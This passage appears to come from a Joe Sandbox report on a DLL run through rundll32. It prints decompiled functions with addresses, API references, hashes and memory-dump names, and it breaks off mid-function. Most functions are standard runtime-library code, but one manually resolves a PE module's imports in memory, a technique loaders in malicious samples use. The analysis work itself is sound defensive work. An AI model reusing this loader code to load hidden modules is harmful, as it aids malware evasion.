0x100028cd
0x100028cd
0x100028d1
0x100028d7
0x100028d3
0x100028d3
0x100028d3
0x100028d9
0x100028db
0x100028e1
0x100028e5
0x100028ea
0x100028f0
0x100028f2
0x100028f6
0x100028f9
0x1000290c
0x00000000
0x100028fb
0x100028ff
0x10002907
0x10002907
0x100028f9
0x100028cb
0x100028ba
0x1000284e
0x1000284e
0x10002851
0x10002854
0x1000285a
0x10002856
0x10002856
0x10002856
0x1000285c
0x1000285e
0x00000000
0x10002860
0x10002860
0x10002863
0x10002869
0x10002865
0x10002865
0x10002865
0x1000286e
0x10002870
0x10002872
0x00000000
0x10002874
0x10002874
0x10002877
0x1000288f
0x10002896
0x100028a2
0x10002879
0x10002879
0x10002880
0x1000288c
0x1000288c
0x10002877
0x10002872
0x1000285e
0x100027b2
0x100027b4
0x10002817
0x1000281d
0x100027b6
0x100027bb
0x100027c5
0x00000000
0x100027c7
0x100027cb
0x100027cd
0x100027cd
0x100027d3
0x100027d9
0x100027d5
0x100027d5
0x100027d5
0x100027dd
0x100027ec
0x100027f1
0x100027f7
0x100027fd
0x10002800
0x10002813
0x00000000
0x10002802
0x10002805
0x1000280e
0x1000280e
0x10002800
0x100027c5
0x100027b4
0x100027b0

APIs

_memmove.LIBCMT ref: 100027EC
_memmove.LIBCMT ref: 100028E5

Strings

invalid string position, xrefs: 10002820
string too long, xrefs: 1000282A, 10002919

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: f973fd9bb2be44b0f2ea6e825edf622ba7edc2182142fe49bda2c142cd92eb19
Instruction ID: d87a46c40a4d9f61d22c64ddf23ae4dcfc0a214cbbe533795640c9f38ab20638
Opcode Fuzzy Hash: f973fd9bb2be44b0f2ea6e825edf622ba7edc2182142fe49bda2c142cd92eb19
Instruction Fuzzy Hash: CF5127357013019BFB24DE6DDC84E5AB7AAEF906D0B10492EF995CB785CB31E845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1001775B, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1001775B(char _a4, intOrPtr _a8) {
				intOrPtr _t12;
				short* _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E1001721E(_t28, ?str?) != 0) {
					if(E1001721E(_t28, ?str?) != 0) {
						return E1001B24C(_t28);
					}
					if(E1000DB1A(_a8 + 0x250, 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(E1000DB1A(_a8 + 0x250, 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t12 = _a4;
				if(_t12 == 0) {
					return GetACP();
				}
				return _t12;
			}

0x1001775f
0x10017764
0x1001778c
0x00000000
0x100177ba
0x100177ac
0x100177dd
0x00000000
0x100177dd
0x00000000
0x100177ae
0x100177db
0x00000000
0x00000000
0x100177e1
0x100177e6
0x100177ea
0x100177ea
0x100177b3

APIs

_wcscmp.LIBCMT ref: 10017772
_wcscmp.LIBCMT ref: 10017783

Strings

OCP, xrefs: 1001777D
ACP, xrefs: 1001776C

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _wcscmp
String ID: ACP$OCP
API String ID: 856254489-711371036
Opcode ID: 1a74065e466ee6f8b10b181075b03c24d2e4a9e9f2129bb5b3a6a6392ea3b58a
Instruction ID: 91b4d29d3cb67e6827e8ca1f4412ed3381e56fc381a14b0805bd1cba564df49c
Opcode Fuzzy Hash: 1a74065e466ee6f8b10b181075b03c24d2e4a9e9f2129bb5b3a6a6392ea3b58a
Instruction Fuzzy Hash: 68015276609516B6EB50EA58DC82FCA33E8EF046A5F504412FE0CEF1C1E734E9C182A5

Uniqueness

Uniqueness Score: -1.00%

Function 10005200, Relevance: 6.4, APIs: 5, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E10005200(intOrPtr* _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _t44;
				signed short _t56;
				signed int _t58;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t65;
				void* _t67;
				intOrPtr* _t68;
				intOrPtr _t69;
				void _t70;
				signed short* _t71;
				intOrPtr _t72;
				intOrPtr _t76;
				intOrPtr* _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				signed short* _t81;
				void* _t83;
				void* _t84;

				_t77 = _a4;
				_t65 =  *_t77;
				_t78 =  *((intOrPtr*)(_t77 + 4));
				_a4 = _t78;
				if( *((intOrPtr*)(_t65 + 0x84)) == 0) {
					L22:
					return 1;
				} else {
					_t67 =  *((intOrPtr*)(_t65 + 0x80)) + _t78;
					_v12 = _t67;
					if(IsBadReadPtr(_t67, 0x14) == 0) {
						while(1) {
							_t44 =  *((intOrPtr*)(_t67 + 0xc));
							if(_t44 == 0) {
								goto L22;
							}
							_t79 =  *((intOrPtr*)( *((intOrPtr*)(_t77 + 0x1c))))(_t44 + _t78,  *((intOrPtr*)(_t77 + 0x28)));
							_t84 = _t83 + 8;
							_v8 = _t79;
							if(_t79 == 0) {
								SetLastError(0x7e);
								return 0;
							} else {
								_t69 = E10005BD0( *((intOrPtr*)(_t77 + 8)), 4 +  *(_t77 + 0xc) * 4);
								_t83 = _t84 + 8;
								if(_t69 == 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t77 + 0x24))))(_t79,  *((intOrPtr*)(_t77 + 0x28)));
									SetLastError(0xe);
									return 0;
								} else {
									_t76 = _t79;
									 *((intOrPtr*)(_t77 + 8)) = _t69;
									 *((intOrPtr*)(_t69 +  *(_t77 + 0xc) * 4)) = _t76;
									 *(_t77 + 0xc) =  *(_t77 + 0xc) + 1;
									_t70 =  *_t67;
									if(_t70 == 0) {
										_t81 =  *((intOrPtr*)(_t67 + 0x10)) + _a4;
										_t71 = _t81;
									} else {
										_t64 = _a4;
										_t81 = _t70 + _t64;
										_t71 =  *((intOrPtr*)(_t67 + 0x10)) + _t64;
									}
									_t56 =  *_t81;
									if(_t56 == 0) {
										L17:
										_t67 = _t67 + 0x14;
										_v12 = _t67;
										if(IsBadReadPtr(_t67, 0x14) != 0) {
											goto L22;
										} else {
											_t78 = _a4;
											continue;
										}
									} else {
										_t72 = _t71 - _t81;
										_v16 = _t72;
										while(1) {
											_t68 = _t72 + _t81;
											_push( *((intOrPtr*)(_t77 + 0x28)));
											if(_t56 >= 0) {
												_t58 = _t56 + _a4 + 2;
											} else {
												_t58 = _t56 & 0x0000ffff;
											}
											_t60 =  *((intOrPtr*)( *((intOrPtr*)(_t77 + 0x20))))(_t76, _t58);
											_t83 = _t83 + 0xc;
											 *_t68 = _t60;
											if(_t60 == 0) {
												break;
											}
											_t56 = _t81[2];
											_t81 =  &(_t81[2]);
											_t72 = _v16;
											_t76 = _v8;
											if(_t56 != 0) {
												continue;
											} else {
												_t67 = _v12;
												goto L17;
											}
											goto L23;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t77 + 0x24))))(_v8,  *((intOrPtr*)(_t77 + 0x28)));
										SetLastError(0x7f);
										return 0;
									}
								}
							}
							goto L23;
						}
					}
					goto L22;
				}
				L23:
			}

0x10005209
0x1000520c
0x1000520e
0x10005211
0x1000521b
0x1000536b
0x10005374
0x10005221
0x10005227
0x1000522c
0x10005237
0x10005240
0x10005240
0x10005245
0x00000000
0x00000000
0x10005256
0x10005258
0x1000525b
0x10005260
0x10005358
0x10005366
0x10005266
0x10005279
0x1000527b
0x10005280
0x1000533e
0x10005345
0x10005353
0x10005286
0x10005289
0x1000528b
0x1000528e
0x10005291
0x10005294
0x10005298
0x100052aa
0x100052ad
0x1000529a
0x1000529a
0x1000529d
0x100052a3
0x100052a3
0x100052af
0x100052b3
0x100052fa
0x100052fa
0x10005300
0x1000530b
0x00000000
0x1000530d
0x1000530d
0x00000000
0x1000530d
0x100052b5
0x100052b5
0x100052b7
0x100052c0
0x100052c0
0x100052c3
0x100052c8
0x100052d5
0x100052ca
0x100052ca
0x100052ca
0x100052dc
0x100052de
0x100052e1
0x100052e5
0x00000000
0x00000000
0x100052e7
0x100052ea
0x100052ed
0x100052f0
0x100052f5
0x00000000
0x100052f7
0x100052f7
0x00000000
0x100052f7
0x00000000
0x100052f5
0x1000531f
0x10005326
0x10005334
0x10005334
0x100052b3
0x10005280
0x00000000
0x10005260
0x10005240
0x00000000
0x10005237
0x00000000

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000000,1000505B,?,00000000,?,?,?,100058DF,00000000,1000505B,10005C60,10005C40), ref: 1000522F
IsBadReadPtr.KERNEL32(?,00000014,?,?,?,?,?,?,?,?,?,?,100058DF,00000000,1000505B,10005C60), ref: 10005303
SetLastError.KERNEL32(0000007F), ref: 10005326
SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,100058DF,00000000,1000505B), ref: 10005345
SetLastError.KERNEL32(0000007E,?,?,?,?,?,?,?,?,100058DF,00000000,1000505B,10005C60,10005C40,10005C30,00000000), ref: 10005358

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast$Read
String ID:
API String ID: 1935436914-0
Opcode ID: 099375d5abdf6a8ea1fd7aa9291f765d852298ed451b5a71a84fdba08d75e4df
Instruction ID: c51bd82149a178ed184975c738b846c90bb39fc300c43f50487aa509e444eaa7
Opcode Fuzzy Hash: 099375d5abdf6a8ea1fd7aa9291f765d852298ed451b5a71a84fdba08d75e4df
Instruction Fuzzy Hash: 68417F71600216ABDB00DF59DC80B9AB7E4FF483A5F04806AED09DB605D776EA61CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10009C45, Relevance: 6.2, APIs: 4, Instructions: 162
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 41%

			E10009C45(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed char* _t41;
				intOrPtr _t42;
				intOrPtr* _t64;
				intOrPtr _t69;
				signed int _t70;
				signed char _t72;
				signed char _t73;
				signed char* _t95;
				signed char _t100;
				signed char** _t102;
				signed char* _t105;
				void* _t106;

				_push(0xc);
				_push(0x100249c8);
				E1000E380(__ebx, __edi, __esi);
				_t69 = 0;
				_t41 =  *(_t106 + 0x10);
				_t72 = _t41[4];
				if(_t72 == 0 ||  *((intOrPtr*)(_t72 + 8)) == 0) {
					L34:
					_t42 = 0;
				} else {
					_t100 = _t41[8];
					if(_t100 != 0 || ( *_t41 & 0x80000000) != 0) {
						_t73 =  *_t41;
						_t102 =  *(_t106 + 0xc);
						if(_t73 >= 0) {
							_t102 =  &(_t102[3]) + _t100;
						}
						 *((intOrPtr*)(_t106 - 4)) = _t69;
						_t105 =  *(_t106 + 0x14);
						if(_t73 >= 0 || ( *_t105 & 0x00000010) == 0) {
							L14:
							_push(1);
							_t16 =  *((intOrPtr*)(_t106 + 8)) + 0x18; // 0x5937e8
							_push( *_t16);
							if((_t73 & 0x00000008) == 0) {
								if(( *_t105 & 0x00000001) == 0) {
									if(_t105[0x18] != _t69) {
										if(E10010F0B() == 0) {
											goto L32;
										} else {
											_push(1);
											if(E10010F0B(_t102) == 0 || E10010F0B(_t105[0x18]) == 0) {
												goto L32;
											} else {
												_t70 = 0;
												_t69 = (_t70 & 0xffffff00 | ( *_t105 & 0x00000004) != 0x00000000) + 1;
												 *((intOrPtr*)(_t106 - 0x1c)) = _t69;
											}
										}
									} else {
										if(E10010F0B() == 0) {
											goto L32;
										} else {
											_push(1);
											if(E10010F0B(_t102) == 0) {
												goto L32;
											} else {
												_t32 =  *((intOrPtr*)(_t106 + 8)) + 0x18; // 0x5937e8
												E10007900(_t102, E10009B92( *_t32,  &(_t105[8])), _t105[0x14]);
											}
										}
									}
								} else {
									if(E10010F0B() == 0) {
										goto L32;
									} else {
										_push(1);
										if(E10010F0B(_t102) == 0) {
											goto L32;
										} else {
											_t25 =  *((intOrPtr*)(_t106 + 8)) + 0x18; // 0x5937e8
											E10007900(_t102,  *_t25, _t105[0x14]);
											if(_t105[0x14] == 4 &&  *_t102 != 0) {
												_push( &(_t105[8]));
												_push( *_t102);
												goto L13;
											}
										}
									}
								}
							} else {
								if(E10010F0B() == 0) {
									goto L32;
								} else {
									_push(1);
									if(E10010F0B(_t102) == 0) {
										goto L32;
									} else {
										_t20 =  *((intOrPtr*)(_t106 + 8)) + 0x18; // 0x5937e8
										_t95 =  *_t20;
										goto L12;
									}
								}
							}
						} else {
							_t64 =  *0x10027eb0; // 0x0
							if(_t64 == 0) {
								goto L14;
							} else {
								 *(_t106 + 0x10) =  *_t64();
								_push(1);
								if(E10010F0B(_t65) == 0) {
									L32:
									E1000F54C();
								} else {
									_push(1);
									if(E10010F0B(_t102) == 0) {
										goto L32;
									} else {
										_t95 =  *(_t106 + 0x10);
										L12:
										 *_t102 = _t95;
										_push( &(_t105[8]));
										_push(_t95);
										L13:
										 *_t102 = E10009B92();
									}
								}
							}
						}
						 *((intOrPtr*)(_t106 - 4)) = 0xfffffffe;
						_t42 = _t69;
					} else {
						goto L34;
					}
				}
				return E1000E3C5(_t42);
			}

0x10009c45
0x10009c47
0x10009c4c
0x10009c51
0x10009c53
0x10009c56
0x10009c5b
0x10009dff
0x10009dff
0x10009c6a
0x10009c6a
0x10009c6f
0x10009c7d
0x10009c7f
0x10009c84
0x10009c89
0x10009c89
0x10009c8b
0x10009c8e
0x10009c93
0x10009ce4
0x10009ce4
0x10009ce9
0x10009ce9
0x10009cef
0x10009d1d
0x10009d73
0x10009db7
0x00000000
0x10009db9
0x10009db9
0x10009dc5
0x00000000
0x10009dd4
0x10009dd9
0x10009ddd
0x10009dde
0x10009dde
0x10009dc5
0x10009d75
0x10009d7e
0x00000000
0x10009d80
0x10009d80
0x10009d8c
0x00000000
0x10009d8e
0x10009d98
0x10009da4
0x10009da9
0x10009d8c
0x10009d7e
0x10009d1f
0x10009d28
0x00000000
0x10009d2e
0x10009d2e
0x10009d3a
0x00000000
0x10009d40
0x10009d46
0x10009d4a
0x10009d56
0x10009d68
0x10009d69
0x00000000
0x10009d69
0x10009d56
0x10009d3a
0x10009d28
0x10009cf1
0x10009cfa
0x00000000
0x10009d00
0x10009d00
0x10009d0c
0x00000000
0x10009d12
0x10009d15
0x10009d15
0x00000000
0x10009d15
0x10009d0c
0x10009cfa
0x10009c9a
0x10009c9a
0x10009ca1
0x00000000
0x10009ca3
0x10009ca5
0x10009ca8
0x10009cb4
0x10009de3
0x10009de3
0x10009cba
0x10009cba
0x10009cc6
0x00000000
0x10009ccc
0x10009ccc
0x10009ccf
0x10009ccf
0x10009cd4
0x10009cd5
0x10009cd6
0x10009cdd
0x10009cdd
0x10009cc6
0x10009cb4
0x10009ca1
0x10009de8
0x10009def
0x00000000
0x00000000
0x00000000
0x10009c6f
0x10009e06

APIs

___AdjustPointer.LIBCMT ref: 10009CD6
_memmove.LIBCMT ref: 10009D4A
___AdjustPointer.LIBCMT ref: 10009D9B
_memmove.LIBCMT ref: 10009DA4

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: AdjustPointer_memmove
String ID:
API String ID: 1721217611-0
Opcode ID: c4aea880468a532bdf069aa258d2073919974baa723d45313becc25ebea1ed3b
Instruction ID: aa4a1e38ea5545946d92b4aff86e206f461069aa4955118aeb566cb8ecd2ec5e
Opcode Fuzzy Hash: c4aea880468a532bdf069aa258d2073919974baa723d45313becc25ebea1ed3b
Instruction Fuzzy Hash: C441A2396483065FFB25DF25D842B6A77E5EF006E0F21402EF8458F5DAEB71E881DA10

Uniqueness

Uniqueness Score: -1.00%

Function 1001847C, Relevance: 6.1, APIs: 4, Instructions: 97
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1001847C(void* __edx, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				void* __ebx;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t60;
				char* _t63;

				_t63 = _a8;
				if(_t63 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t63 != 0) {
					E1000A09F(_t50,  &_v20, __edx, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E10014B0C( *_t63 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t60 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t63, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t60;
							}
							L20:
							_t44 = E1000BE7A(__eflags);
							_t60 = _t60 | 0xffffffff;
							__eflags = _t60;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t60 = _v20;
						__eflags =  *(_t60 + 0x74) - 1;
						if( *(_t60 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t60 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t63[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t60 =  *(_t60 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t60 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t60 + 4), 9, _t63,  *(_t60 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t60 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t63 & 0x000000ff;
					}
					_t60 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

0x10018484
0x10018489
0x100184a3
0x00000000
0x100184a3
0x1001848b
0x10018490
0x00000000
0x00000000
0x10018495
0x100184b2
0x100184b7
0x100184ba
0x100184c1
0x100184e0
0x100184e7
0x100184e9
0x1001852d
0x1001853c
0x1001854a
0x1001854c
0x1001855c
0x1001855c
0x10018560
0x10018562
0x10018565
0x10018565
0x10018565
0x10018565
0x00000000
0x1001856b
0x1001854e
0x1001854e
0x10018553
0x10018553
0x10018556
0x00000000
0x10018556
0x100184eb
0x100184ee
0x100184f2
0x1001851b
0x1001851b
0x1001851e
0x1001851e
0x00000000
0x00000000
0x10018520
0x10018524
0x00000000
0x00000000
0x10018526
0x10018526
0x00000000
0x10018526
0x100184f4
0x100184f7
0x00000000
0x00000000
0x100184fb
0x1001850e
0x10018514
0x10018517
0x10018519
0x00000000
0x00000000
0x00000000
0x10018519
0x100184c3
0x100184c6
0x100184c8
0x100184cd
0x100184cd
0x100184d2
0x00000000
0x100184d2
0x10018497
0x1001849c
0x100184a0
0x100184a0
0x00000000

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 100184B2
__isleadbyte_l.LIBCMT ref: 100184E0
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 1001850E
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 10018544

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 38b44122305ecf14784b749cfce8701fab708f6b8581936454afa88a208ef460
Instruction ID: a8a0aa5664c024e053ff83a3cf24f478a6b9cc7505f7189f09961619af3c2f64
Opcode Fuzzy Hash: 38b44122305ecf14784b749cfce8701fab708f6b8581936454afa88a208ef460
Instruction Fuzzy Hash: AF31CC30604656AFEB11CE64CC44BAA7BF6FF413A0F124529E8558F0A0EB30EB91DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10009578, Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 21%

			E10009578(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __ebp;
				void* _t25;
				void* _t28;
				void* _t29;
				intOrPtr _t30;
				void* _t31;
				intOrPtr* _t32;
				void* _t34;

				_t31 = __esi;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E10009BB7(__ebx, _t30, __esi, _t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E10008274(_t28);
				_push(_t31);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E10009E55(_t27, _t29, _t32, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E10009372(_t27, _t29, _t30, _t32, _t37);
				if(_t25 != 0) {
					E10008242(_t25, _t30);
					return _t25;
				}
				return _t25;
			}

0x10009578
0x10009578
0x1000957b
0x10009580
0x10009583
0x10009585
0x10009588
0x1000958b
0x1000958c
0x1000958f
0x10009594
0x10009594
0x10009597
0x1000959b
0x1000959e
0x100095a3
0x100095a0
0x100095a0
0x100095a0
0x100095a6
0x100095ab
0x100095ac
0x100095af
0x100095b1
0x100095b4
0x100095b7
0x100095b8
0x100095c1
0x100095c6
0x100095c9
0x100095cf
0x100095d2
0x100095d5
0x100095d8
0x100095d9
0x100095dc
0x100095e7
0x100095eb
0x00000000
0x100095eb
0x100095f2

APIs

___BuildCatchObject.LIBCMT ref: 1000958F

Part of subcall function 10009BB7: ___AdjustPointer.LIBCMT ref: 10009C00

_UnwindNestedFrames.LIBCMT ref: 100095A6
___FrameUnwindToState.LIBCMT ref: 100095B8
CallCatchBlock.LIBCMT ref: 100095DC

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 30e3ed74f56a3d82ea08bb1e38d317abc74497084f79d728a1612ccf17401e1e
Instruction ID: 3d0b7881054de8809452d483c9e4562791fceb78238f100fcb57a1fcb5cb1ca7
Opcode Fuzzy Hash: 30e3ed74f56a3d82ea08bb1e38d317abc74497084f79d728a1612ccf17401e1e
Instruction Fuzzy Hash: 9D012532000509BBEF129F56CC01EDA3BBAFF48794F058114F95862124C732E961EBA4

Uniqueness

Uniqueness Score: -1.00%

Function 1000F66E, Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000F66E(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E1000FBBF(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E1000F6F4(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E1000FE3A(_t28, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E1000FD79(_t28, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x1000f671
0x1000f677
0x1000f6ea
0x00000000
0x1000f67e
0x1000f67e
0x1000f681
0x1000f69c
0x1000f69f
0x1000f6bf
0x1000f6d1
0x1000f6a1
0x1000f6a1
0x1000f6a4
0x00000000
0x1000f6a6
0x1000f6b8
0x1000f6b8
0x1000f6a4
0x1000f6ef
0x1000f6f3
0x1000f683
0x1000f69b
0x1000f69b
0x1000f681

APIs

__cftof_l.LIBCMT ref: 1000F692

Part of subcall function 1000FD79: __fltout2.LIBCMT ref: 1000FDA2

__cftog_l.LIBCMT ref: 1000F6B8
__cftoe_l.LIBCMT ref: 1000F6EA

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 48f7ec47e38887af6bc9455cfcedb25b610ca174dcc1c45b61626f484b723fec
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 2A01497640018EBBDF129E94CC018EE3F66FB18394B548419FE1899839D737D9B2BB81

Uniqueness

Uniqueness Score: -1.00%

Function 100013E0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 39%

			E100013E0(void* __ebx, void* __edi, intOrPtr* _a4, void _a8) {
				intOrPtr* _v0;
				intOrPtr _v28;
				intOrPtr _v44;
				intOrPtr* _v48;
				intOrPtr* _t42;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t51;
				intOrPtr* _t52;
				char* _t58;
				intOrPtr* _t62;
				intOrPtr* _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				char* _t74;
				intOrPtr _t78;
				void* _t84;
				intOrPtr* _t85;
				intOrPtr _t86;
				intOrPtr _t91;
				intOrPtr _t93;
				intOrPtr* _t101;
				intOrPtr* _t102;
				intOrPtr _t104;
